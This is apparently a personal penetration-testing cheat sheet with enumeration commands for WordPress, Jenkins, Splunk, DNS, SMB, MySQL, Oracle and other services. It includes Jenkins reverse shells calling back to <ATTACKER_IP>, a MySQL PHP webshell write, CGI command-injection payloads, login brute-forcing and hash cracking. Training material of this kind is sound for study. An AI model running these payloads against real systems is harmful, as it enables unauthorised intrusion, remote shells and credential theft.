  • API for Vuln DB (free use requires token): https://wpscan.com/api/

WPScan is great, but manual enumeration can also uncover more information sometimes (e.g. certain plugins)

/robots.txt

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

Folders

• /wp-admin
• /wp-content
  • plugins: often a source of vulnerabilities
  • themes: same
  • scanning for readme.txt under these folders can find hidden resources
• wp-login.php

Users

• Administrator: can add and delete users and posts, as well as editing source code
  • leads to RCE!
• Editor: can publish and manage all posts
• Author: can publish and manage their own posts
• Contributor: can write and manage their own posts but not publish
• Subscriber: can browse posts and edit their profiles

Page Source

curl -so- '<TARGET>/robots.txt'
curl -s <TARGET> | grep -i -e WordPress -e themes -e plugins

WPScan

• API Token: https://wpscan.com/profile/

# Generic enumeration
sudo wpscan -t 20 --api-token <API_TOKEN> --url <TARGET> --enumerate

# Enumerate all plugins
sudo wpscan -t 20 --api-token <API_TOKEN> --url <TARGET> --enumerate ap

# Login brute-force
sudo wpscan -t 20 --url <TARGET> --password-attack xmlrpc -U <USER> -P /usr/share/wordlists/rockyou.txt

Joomla

• https://github.com/SamJoan/droopescan
• https://github.com/drego85/JoomlaScan

/robots.txt

...
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Page Source

curl -s <TARGET>/README.txt
curl -s <TARGET>/administrator/manifests/files/joomla.xml | xmllint --format -
curl -s <TARGET> | grep -i Joomla

Scanning

pip3 install droopescan 

droopescan scan joomla --url <TARGET>

Drupal

Users:

• Administrator: has complete control over the Drupal website.
• Authenticated User: can log in to the website and perform operations such as adding and editing articles based on their permissions.
• Anonymous: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

Page Source

curl -s <TARGET> | grep -i Drupal

# Version (older Drupals only)
curl -s <TARGET> | grep -m2 ""

Scanning

pip3 install droopescan

droopescan scan drupal --url <TARGET>

Tomcat

• webapps/conf/tomcat-users.xml: users and creds for management web server manager
• webapps/manager/WEB-INF/web.xml: deployment descriptor of the server page routes and classes
• webapps/manager/WEB-INF/classes/: contains specific logic and probably sensitive information

Apache Jserv and Tomcat

sudo nmap -sV -p 8009,8080 <TARGET>

Page Source

curl -s <TARGET>/invalid | grep Tomcat 
curl -s <TARGET>/docs/ | grep Tomcat 

Find Web Manager Pages /manager or host-manager

feroxbuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u <TARGET>

Brute-Force Web Manager

msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
set rhosts <TARGET>
set VHOST <FQDN>
set RPORT <PORT>
set stop_on_success true
run

Jenkins

Attach Slave Servers and Tomcat

sudo nmap -sV -p 5000,8080 <TARGET>

Script Console

Linux

# Execute System Command
def cmd = '<COMMAND>'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

nc -lvnp <PORT>

# Reverse Shell Callback
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ATTACKER_IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows

nc -lvnp <PORT>

# Reverse Shell Callback
String host="<ATTACKER_IP>";
int port=<PORT>;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Splunk

Weak or null authentication are the most likely vectors

Splunk WebApp

sudo nmap -sV -p 8000,8089 <TARGET>

Uploading Callback Shell

<TARGET>/en-US/app/launcher/home

# Splunk Reverse Shell
git clone https://github.com/0xjpuff/reverse_shell_splunk.git
cd reverse_shell_splunk/reverse_shell_splunk/

# !!! UPDATE !!!
# Change 'attacker_ip_here' and attacker_port_here in the respective script(s)

cd ..
tar -cvzf updater.tar.gz reverse_shell_splunk/

nc -lvnp 8443

# NOTE: uploading the app, causes it run immediately; ensure `nc` is running
# From <TARGET>/en-US/manager/search/apps/local > Install app from file

PRTG Network Monitor

PRTG WebApp

sudo nmap -sV -p 80,443,8080 <TARGET>

curl -s <TARGET> | grep -i Version

osTicket

For some public facing services, one can acquire a valid, internal email by submitting a ticket, though this might require email activation.

Gitlab

• Github: https://tillsongalloway.com/finding-sensitive-information-on-github/index.html

CGI

• Check in:
  • cgi
  • cgi-bin

# Overall (though a bit blunt)
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/LEGACY-SERVICES/CGIs/CGIs.txt -u 'http://<TARGET>/'

# Windows
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "bat,cmd,exe,vbs,cgi" -u 'http://<TARGET>/cgi/'
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "bat,cmd,exe,vbs,cgi" -u 'http://<TARGET>/cgi-bin/'

# Linux
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "sh,cgi,pl,py" -u "http://<TARGET>/cgi/"
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "sh,cgi,pl,py" -u "http://<TARGET>/cgi-bin/"

NOTE: any command injection might require URL-encoding of the commands though this can be avoided with curl’s option --data-urlencode

# CONFIRM
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& dir'
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& C:\windows\system32\ipconfig.exe'

# File reads ("TACOMAN" is stripped out therefore arbitrary)
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& C:\Windows\System32\find.exe /V "TACOMAN" <FILE>'

Remember certain commands like type or dir are internal DOS commands and do not exist as a .exe file.

ColdFusion

• on TCP/8500 has the following directories:
  • CFIDE
  • cfdocs

CF Stack

# Mail, HTTP, HTTPS, RPC, Server Monitor, SSL
sudo nmap -sV -p 25,80,443,1935,5500,8500 <TARGET>

IIS

# HTTP, HTTPS, MSSQL, WinRM, WinRM Secure, Alt Port, Alt Port, Web Deploy
sudo nmap -sV -p 80,443,1433,5985,5986,8000,8080,8172 <TARGET>

LDAP

sudo nmap -sV -p 389,636 <TARGET>

Harderning

DNS

• UDP 53: normal name queries
• TCP 53: zone transfers and syncs
• Server Config (Bind9)
  • /etc/bind/named.conf.local
  • /etc/bind/named.conf.options
  • /etc/bind/named.conf.log
  • https://wiki.debian.org/BIND9
• https://web.archive.org/web/20250329174745/https://securitytrails.com/blog/most-popular-types-dns-attacks
• Domain Takeover: https://github.com/EdOverflow/can-i-take-over-xyz

# Add subdomains or vHosts
echo '<IP_ADDR> <DOMAIN>' | sudo tee -a /etc/hosts

# Registrar Info
whois <DOMAIN> | whois.txt

# Query Nameserver for domain
dig @<DNS_SERVER> ns <DOMAIN>

# PTR Record or Reverse DNS Query
dig @<DNS_SERVER> -x <IP_ADDRESS>

# OLD: version / all records / zone transfer
dig @<DNS_SERVER> CH TXT version.bind <DOMAIN>
dig @<DNS_SERVER> ANY <DOMAIN>
dig @<DNS_SERVER> AXFR <DOMAIN>

# --- Record Types ---
# ANY: return all records -- sometimes doesnt work!
# A: IPv4 address
# AAAA: IPv6 address
# CNAME: Canonical Name
# MX: Mail Servers
# NS: Name Servers
# PTR: Pointer Record
# SOA: Start of Authority
# TXT: Text Records
# SRV: Service Records
# CAA: Certification Authority Authorization
for type in A AAAA CNAME MX NS SOA SRV TXT CAA; do echo -e "\n--- $type ---"; dig @<DNS_SERVER> +short $type <DOMAIN>; done

# PASSIVE: subdomain enum
# NOTE: requires API keys
subfinder -v -d <DOMAIN>

# ACTIVE: subdomain enum (quick, external)
puredns bruteforce /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt <DOMAIN>

# ACTIVE: subdomain enum (slower, internal)
# /usr/share/SecLists/Discovery/DNS/namelist.txt
gobuster dns --threads 64 --output gobuster_dns_top110000 --quiet -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --resolver <DNS_SERVER> --domain <DOMAIN>

🌐 Subdomains

• Certificate Transparency: https://crt.sh/
• https://domain.glass/
• (PAID) https://buckets.grayhatwarfare.com/

# Domain => Subdomains via Cert Registry
curl -s "https://crt.sh/?q=<DOMAIN>&output=json" | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u | tee subdomainlist.txt
# Full Info 
for i in $(cat subdomainlist.txt) ; do host $i | tee -a hostinfo.txt ; done
# (IPv4) Domain Name => IP Address
for i in $(cat subdomainlist.txt) ; do host $i | grep "has address" | cut -d" " -f1,4 | tee -a domain_ipaddress.txt ; done
# (IPv4) Addresses Only
for i in $(cat domain_ipaddress.txt) ; do host $i | grep "has address" | cut -d" " -f4 | tee -a ip-addresses.txt ; done
# (IPv4) Addresses => Services via Shodan
for i in $(cat ip-addresses.txt) ; do shodan host $i ; done

# DNS: old technique
dig any <DOMAIN>

# Content Search: google.com Dork
inurl:<DOMAIN> intext:<TERM>

LLMNR & NBT-NS

• UDP 5355: LLMNR (modern)
• UDP 137: NBT-NS (ancient)

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that used as failover protocols when DNS is unavailable.

On a Windows, the box will attempt to resolve a hostname in this order:

1. Checks Local HOSTS file.
2. Checks DNS Cache / DNS Server.
3. (If DNS Fails): Sends LLMNR Multicast.
4. (If LLMNR Fails): Sends NBT-NS Broadcast.

Remediation

Typically, disabling LLMNR and NBT-NS can cautiously used (to ensure no breakages) at the network or host-level.

• Disable LLMNR by:

  • Group Policy –>
  • Computer Configuration –>
  • Administrative Templates –>
  • Network –>
  • DNS Client
  • Enable “Turn OFF Multicast Name Resolution”

• Disable NBT-NS (locally only on each host or via GPO w/ PowerShell):

  • Network and Sharing Center –>
  • Control Panel –>
  • Change adapter settings
  • Right-clicking on the adapter –> properties –>
  • Selecting Internet Protocol Version 4 (TCP/IPv4) –> Properties –> Advanced –> selecting the WINS tab
  • Select “Disable NetBIOS over TCP/IP”

FTP

• TCP 20: data transfer

  • Active: Client->Server
  • Passive: Server->Client

• TCP 21: control channel

• Server Config: /etc/vsftpd.conf

  • http://vsftpd.beasts.org/vsftpd_conf.html

• DISALLOWED FTP users: /etc/ftpusers

• Commands: https://web.archive.org/web/20230326204635/https://www.smartfile.com/blog/the-ultimate-ftp-commands-list/

• Server Return Codes: https://en.wikipedia.org/wiki/List_of_FTP_server_return_codes

**TFTP has no auth and uses only UDP.

# Connect to FTP server in passive mode with anonymous login
ftp -p ftp://<USER>:<PASS>@<TARGET>
passive

# lftp equivalents
lftp ftp://<USER>:<PASS>@<TARGET>
set ftp:passive-mode off

# Execute local commands (outside of session)
!<COMMAND>

# List files and directories
ls -la
ls -laR

# Read file
get <FILENAME> -
# Download file
get <FILENAME>
# Upload file
put <FILENAME>
# Download all files
mirror .

# Download ALL files
mkdir ftp_files && cd ftp_files
wget -m --no-passive-ftp ftp://anonymous:anonymous@<TARGET>

HTTP

• TCP 80: HTTP unencrypted
• TCP 443: HTTPS encrypted
• PORT (Web is oftentimes on other ports, especially internal proxies or admin pages on 8080 or 8433)

• OWASP Top 10:
  • https://owasp.org/www-project-top-ten/
• HTTP Codes:
  • https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#Standard_codes
• Web Page Scanner:
  • https://github.com/RedSiege/EyeWitness
• /.well-known/ URIs:
  • https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml
• User-Agent: https://useragents.io/explore
• Default Web Roots:
  • Linux: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt
  • Windows: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt

# HTTP Headers + robots.txt
curl -skLI -o curl_http_headers.txt http://<TARGET>
curl -skL -o curl_robots.txt http://<TARGET>/robots.txt

---

# Checks for WAF (wbapp firewall)
wafw00f <TARGET>

# Enum web server + version + OS + frameworks + libraries
whatweb --aggression 3 http://<TARGET> --log-brief=whatweb_scan.txt

# Fingerprint web server
nikto -o nikto_fingerprint_scan.txt -Tuning b -h http://<TARGET>

# Enum web server vulns
nikto -o nikto_vuln_scan.txt -h http://<TARGET>

# Enum web app logic & vulns
wapiti -f txt -o wapiti_scan.txt --url http://<TARGET>

# Webpage Crawler
pip3 install --break-system-packages scrapy
wget -O ReconSpider.zip https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.2.zip && unzip ReconSpider.zip
python3 ReconSpider.py <URL> && cat results.json
# !!! CHECK "results.json" !!!

# NOTE: filter out by response size since an HTTP response of 200 OK will always be received
ffuf -ic -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -H 'Host: FUZZ.<DOMAIN>' -u http://<TARGET>/ -fs <SIZE>
# Add NEW vHosts to automatically resolve them later
echo '<IP_ADDR> <VHOST>.<FQDN>' | sudo tee -a /etc/hosts

Directory Brute-Forcing

# OTHER LARGER DIR LIST
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

# Directory Bruteforce
feroxbuster -t 64 -w /usr/share/seclists/Discovery/Web-Content/common.txt --depth 2 -o feroxbuster_dir_common --scan-dir-listings -u http://<TARGET>

# Bruteforce File Extensions (-x)
feroxbuster -t 64 -w /usr/share/seclists/Discovery/Web-Content/common.txt --depth 2 -o feroxbuster_dir_extensions --scan-dir-listings -x php,html,txt,bak,zip -u http://<TARGET>

---

# AUTOMATED Recon
git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
chmod +x ./finalrecon.py
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt
./finalrecon.py -nb -r -cd final_recon_scan -w /usr/share/wordlists/dirb/common.txt --headers --crawl --ps --dns --sub --dir --url http://<URL>

TODO: cull down AI slop below

URL Encoding

# 1. Curl Auto-Encoding (GET Requests)
# -G converts --data into a GET query string. --data-urlencode handles the special chars.
curl -G -i "http://<TARGET>/cgi/welcome.bat" --data-urlencode "cmd=C:\windows\system32\whoami.exe & id"

# 2. Python One-Liner (For generating payloads for Burp/Browser)
python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))" 'cat /etc/passwd & id'

# 3. The "Slicker Way" (Add this to your ~/.zshrc or ~/.bashrc)
alias urlencode='python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))"'
# Usage: urlencode "payload&goes=here"

URL Encoding (Percent-Encoding) is not an obfuscation technique; it is a mechanical requirement of the HTTP protocol. You must encode characters to stop the Web Server from confusing your Payload Data with HTTP Syntax.

The CGI / Command Injection Rule: When exploiting CGI scripts (.sh, .bat, .cgi), the web server unwraps the URL and hands the raw string directly to the OS shell (/bin/bash or cmd.exe). If you do not URL-encode your shell operators (&, |, ;), the web server strips them out during the HTTP parsing phase, and the OS shell never executes them.

• Double Encoding (WAF Bypass): If a WAF blocks %5C (\), encode the % symbol itself (% = %25). The payload becomes %255C. The WAF sees %255C (Allowed), passes it to the backend, which decodes it once to %5C, and the application decodes it again to \.
• Space Variants:
  • In the URL Path (GET /path%20here), use %20.
  • In the Query String / Body (?cmd=id+whoami), + is historically interpreted as a space (application/x-www-form-urlencoded), but %20 is universally safer to avoid parsing desyncs. Default to %20.

IMAP/POP3

• TCP 143/993: IMAP unc/enc
• TCP 110/995: POP3 unc/enc

# Enumerate
sudo nmap -n -Pn -sV -sC -p25,110,143,465,587,993,995 <TARGET>

### Non-Interactive

# IMAPS
curl -vkL --user '<USER>':'<PASSWORD>' 'imaps://<TARGET>' -X <COMMAND>

# POP3S
curl -vkL --user '<USER>':'<PASSWORD>' 'pop3s://<TARGET>' -X <COMMAND>

### Interactive

# IMAPS
openssl s_client -connect <TARGET>:imaps
1 LOGIN <USERNAME> <PASSWORD>
1 LIST "" *	# Lists all directories
1 SELECT "<MAILBOX>" # Selects a mailbox
1 UNSELECT "<MAILBOX>" # Exits the selected mailbox
1 FETCH <ID> all # Metadata of email
1 FETCH 1:* (BODY[]) # Show all emails
1 CREATE "INBOX" # Creates a mailbox with a specified name
1 DELETE "INBOX" # Deletes a mailbox
1 RENAME "ToRead" "Important" #	Renames a mailbox
1 LSUB "" *	# Returns a subset of names from the set of names that the User has declared as being active or subscribed
1 CLOSE	# Removes all messages with the Deleted flag set
1 LOGOUT # Closes the connection

# POP3s
openssl s_client -connect <TARGET>:pop3s
USER <USERNAME>
PASS <PASSWORD>
STAT	# List num of saved emails from the server.
LIST	# List number and size of all emails.
RETR <ID>	# Deliver the requested email by ID.
DELE <ID> # Delete the requested email by ID.
CAPA	# Display the server capabilities.
RSET	# Reset the transmitted information.
QUIT	# Close connection

IPMI

• UDP 623: normal
• Default Passwords:
  • Dell iDRAC: root:calvin
  • HP iLO: Administrator:[randomized 8-character string consisting of numbers and uppercase letters]
  • Supermicro IPMI: ADMIN:ADMIN

A hardware control protocol that gives “virtual” physical access to a machine.

### Enumeration via nmap
sudo nmap -sU -p623 --script ipmi-version

### Metasploit Scanner
setg RHOSTS <TARGET>
# https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version/
use auxiliary/scanner/ipmi/ipmi_version
run
# https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/
use auxiliary/scanner/ipmi/ipmi_dumphashes
run

### Crack HP iLO format
# https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat -m 7300 ipmi_hash.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
hashcat -m 7300 -w 3 -O "<HASH>" /usr/share/wordlists/rockyou.txt

MySQL

• TCP 3306: normal
• Server Config:
  • /etc/mysql/mysql.conf.d/mysqld.cnf
• default system schemas/databases:
  • mysql - is the system database that contains tables that store information required by the MySQL server
  • information_schema - provides access to database metadata
  • performance_schema - is a feature for monitoring MySQL Server execution at a low level
  • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
• secure_file_priv may be set as follows:
  • If empty, the variable has no effect, which is not a secure setting.
  • If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
  • If set to NULL, the server disables import and export operations
• System Schema: https://dev.mysql.com/doc/refman/8.0/en/system-schema.html#:~:text=The%20mysql%20schema%20is%20the,used%20for%20other%20operational%20purposes
• Logical Operators: https://mariadb.com/docs/server/reference/sql-structure/operators/operator-precedence
• Cheatsheet: https://devhints.io/mysql

Database > Schema > Table > Column > Value

# Login
# - try "root"
mysql -u <USER> -h <TARGET>
mysql -u <USER> --password=<PASSWORD> -P <PORT> -h <TARGET>

sqlmap’s query data has a lot of good example commands for enumeration:

• https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/queries.xml

-- Show Version
SELECT @@version ;
SELECT version() ;

-- Show User
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

SHOW databases ;
SHOW grants ;

-- Show if user is privileged
SELECT super_priv FROM mysql.user
SELECT super_priv FROM mysql.user WHERE user="root"

-- Show user permissions
SELECT grantee,privilege_type FROM information_schema.user_privileges
SELECT grantee,privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"
-- look for interesting perms like "FILE" to read/write files

-- Tables and metadata
USE sys ;
SELECT host,unique_users FROM sys.host_summary ;

USE <DATABASE> ;
SHOW tables ;
DESCRIBE <TABLE> ;

-- Write data
INSERT INTO <TABLE> VALUES (<COL1_VAL>, <COL2_VAL>, <COL3_VAL>, ...);

-- Get data
SELECT * FROM <TABLE> WHERE <COLUMN> = "<VALUE>" ;
# WHERE x LIKE "%blah%" ;
SELECT * FROM <TABLE> WHERE <COLUMN> LIKE "%<VALUE>%" ORDER BY <COLUMN> ASC|DESC LIMIT <NUM> ;

-- Example COUNT
SELECT COUNT(*) FROM <TABLE> WHERE <COLUMN1> > 10000 OR <COLUMN2> NOT LIKE '%<KEYWORD>%' ;

Enumeration

MySQL

These commands are specific though not necessarily exclusive to MySQL

• https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html
• https://dev.mysql.com/doc/refman/8.0/en/information-schema-schemata-table.html
• Default (built-in) databases:
  • information_schema
  • performance_data
  • mysql

# Show currently used database (if inside a query)
SHOW database()

USE information_schema ;  # metadata

# Get database names
SELECT schema_name FROM information_schema.schemata ;

# Show tables
SELECT table_name,table_schema FROM information_schema.tables where table_schema='<DATABASE>' ;

# Get columns
select COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='<TABLE>' ;

# Finally read values
SELECT <COLUMN> FROM <DATABASE>.<TABLE> ;

Read Files

-- Read Files
SELECT LOAD_FILE("/etc/passwd") ;

Write Files

1. User with FILE privilege enabled
2. MySQL global secure_file_priv variable not enabled
3. Write access to the location we want to write to on the back-end server

-- Write Files
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
-- For 4 columns
SELECT "","<?php system($_REQUEST[0]); ?>","","" INTO OUTFILE '/var/www/html/webshell.php';

curl -o- 'http://<TARGET>/webshell.php?0=<COMMAND>'

NFS

Similiar to SMB.

• TCP/UDP 111: NFSv2/v3
  • and various dynamic ports using rpcbind and portmapper
• TCP 2049: NFSv4
• Server Config: /etc/exports
  • https://manpages.ubuntu.com/manpages/trusty/man5/exports.5.html

# Show shared dirs
df
exportfs -sv

# Show NFS Shares on server
showmount -e <TARGET>

# Mount NFS
mkdir target-NFS
sudo mount -t nfs -o nolock <TARGET>:/ ./target-NFS
sudo umount ./target-NFS

# Enumerate
sudo nmap -n -Pn -p111,2049 -sV -sC <TARGET>
sudo nmap -n -Pn -p111,2049 -sV --script 'nfs*' <TARGET>

Nix: R-services

• TCP 512/513/514: rexecd, rlogind, rshd
• UDP 513: rwhod
• https://en.wikipedia.org/wiki/Berkeley_r-commands
• Server Config
  • /etc/hosts.equiv: allowed hosts for rlogin
  • ~/{.rlogin, .rhosts}: allowed hosts

Suite of obsolete remote management tools. All communication is unencrypted including its authentication.

# Enum via nmap
sudo nmap -sV -p 512,513,514 <TARGET>

# Remote copy; does not confirm remote overwriting of files
rcp
# Remote shell
rsh
# Remote command
rexec
# Remote login (telnet-like)
rlogin <TARGET> -l <USER>
# Show authenticated users
rwho
rusers -al <TARGET>

Nix: Rsync

• TCP 873: normal
• Pentesting: https://archive.ph/flPtZ
• Rsync via ssh: https://phoenixnap.com/kb/how-to-rsync-over-ssh

# Enum via nmap
sudo nmap -sV -p873 <TARGET>

# Enum dir
rsync -av --list-only rsync://<TARGET>/<DIR>

# Download dir optionally via SSH
rsync -av -e "ssh -p <SSH_PORT>" rsync://<TARGET>/<DIR>

Nix: SSH

• TCP 22: normal
• Server Config:
  • /etc/ssh/sshd_config
  • https://www.ssh.com/academy/ssh/sshd_config
• Versions:
  • v1: obselete and vuln to MITM
  • v2: modern

# Audit sercurity of SSH server
# https://github.com/jtesta/ssh-audit
git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
./ssh-audit.py -l warn <TARGET> | tee ssh_audit.txt

# Specify auth-method: password
ssh -v -o PreferredAuthentications=password <USER>@<TARGET>

sshpass -p '<PASSWORD>' ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -p 22 <USER>@<TARGET>

# Force auth-method: privkey
ssh -i <PRIVATE_KEY> <USER>@<TARGET>

Oracle TNS

• TCP 1521: normal
• Server Config:
  • $ORACLE_HOME/network/admin/tnsnames.ora: names to addrs
  • $ORACLE_HOME/network/admin/listener.ora: listener behavior
  • $ORACLE_HOME/sqldeveloper: DB protection blacklist
  • Default Password: DBSNMP/dbsnmp
• https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985

Oracle’s version of SQL.

# SID Brute-forcing via nmap
sudo nmap -p1521 -sV --script oracle-sid-brute <TARGET>

### ODAT
# TNS Setup for Enumeration
wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
sudo mkdir -p /opt/oracle
sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
source ~/.bashrc
cd ~
git clone https://github.com/quentinhardy/odat.git
cd odat/
pip install --break-system-packages python-libnmap
git submodule init
git submodule update
pip3 install --break-system-packages cx_Oracle
sudo apt install -y python3-scapy
sudo pip3 install --root-user-action colorlog termcolor passlib python-libnmap
sudo apt install -y build-essential libgmp-dev
pip3 install --break-system-packages pycryptodome

# Enumeration
odat.py all -d <SID> -s <TARGET>

### Connect
# Install: https://askubuntu.com/a/207145
sqlplus <USER>/<PASSWORD>@<TARGET>/<SID>
sqlplus <USER>/<PASSWORD>@<TARGET>/<SID> as sysdba
# https://stackoverflow.com/questions/27717312/sqlplus-error-while-loading-shared-libraries-libsqlplus-so-cannot-open-shared
# If you come across the following error sqlplus:
# error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory, 
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf" ; sudo ldconfig

# SQL Commands
select table_name from all_tables ;
select * from user_role_privs ;
select name, password from sys.user$ ;

### Upload webshell (if webserver)
# Linux	/var/www/html
# Windows	C:\inetpub\wwwroot
echo "Oracle File Upload Test" > testing.txt
odat.py utlfile -d <SID> -U <USER> -P <PASSWORD> -s <TARGET> --sysdba --putFile <UPLOAD_DIR> testing.txt ./testing
curl -Lo- http://<TARGET>/testing.txt

SMB/CIFS/RPC

• TCP 135: RPC Endpoint Mapper (EPM)
• UDP 137, UDP 138, TPC 139: legacy (CIFS/SMB1)
• TCP 445: RPC/(SMB2/3)
• Shares:
  • C$ (drive)
  • ADMIN$ (Windows drive)
  • IPC$ (RPC)
  • PRINT$

• https://hacktricks.wiki/en/network-services-pentesting/pentesting-rpcbind.html

# ANON: List available SMB shares
smbclient -U "" -N --list //<TARGET>/
smbclient -U "guest" -N --list //<TARGET>/

# ANON: Connect to an SMB share
smbclient -U "" -N //<TARGET>/<SHARE>
smbclient -U "guest" -N //<TARGET>/<SHARE>

# Connect to SMB share
smbclient --user=<DOMAIN>/<USERNAME> --password='<PASSWORD>' //<TARGET>/<SHARE>
ls  # List files
more  # read file
get <FILE>  # Download file
recurse  # Toggle directory recursion
# Download recursion
recurse on
prompt off
mget *
# Execute local commands (outside of session)
!<COMMAND>

---

# https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol
# badPwdCount: https://learn.microsoft.com/en-us/windows/win32/adschema/a-badpwdcount

nxc smb <TARGET> -u '' -p '' --users --groups --shares --pass-pol

# User and Groups
netexec smb <TARGET> -u "<USERNAME>" -p "<PASSWORD>" --users
netexec smb <TARGET> -u "<USERNAME>" -p "<PASSWORD>" --groups

# List shares
netexec smb <TARGET> -u "<USERNAME>" -p "<PASSWORD>" --shares

# Recursively list files
smbmap -r --depth 3 -r <SHARE> -u <USERNAME> -p <PASSWORD> -H <IP>
# Directories only
smbmap -R <SHARE> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> -H <IP> --dir-only

---

# https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf
# https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html

# RPC
rpcclient -U '<USER>%<PASSWORD' <TARGET>
querydominfo	# Provides domain, server, and user info
enumdomusers  # Enumerates all domain users
srvinfo	 # Server information
enumdomains	 # Enumerate all domains
netshareenumall	 # Enumerates available shares
netsharegetinfo <SHARE>	 # Info about a specific share
queryuser <RID>  # User info

---

# TODO: move these to a more appropriate/relevant section

# Brute-Forcing RIDs via RPC
for i in $(seq 500 1100);do rpcclient -N -U "" <TARGET> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

# Same with other tools
samrdump.py <TARGET>
smbmap -H <TARGET>

enum4linux-ng

enum4linux-ng uses various protocols for enumeration that are outside of the scope here, but for knowledge of the services:

# Enumeration SMB/NetBIOS
enum4linux-ng -oA enum4linux-ng-log -A <TARGET>

SMTP/ESMTP

• TCP 25: unencrypted
• TCP 465/587/2525: encrypted
• Security:
  • DKIM: https://dkim.org/
  • Sender Policy Framework (SPF): https://dmarcian.com/what-is-spf/
  • DMARC: https://dmarc.org/
• https://serversmtp.com/smtp-error/

• https://hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html#basic-actions

# CAREFUL! Open relay check
sudo nmap -p25,465,587,2525 --script smtp-open-relay <TARGET>

# User enum
# https://github.com/cytopia/smtp-user-enum#how-does-vrfy-work
# TRY: -M VRFY
wget https://raw.githubusercontent.com/cytopia/smtp-user-enum/refs/heads/master/smtp-user-enum

python3 ./smtp-user-enum --mode VRFY --file /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --domain <DOMAIN> <TARGET> 25

# Manual enumeration
telnet <TARGET> 25
EHLO <HOSTNAME>
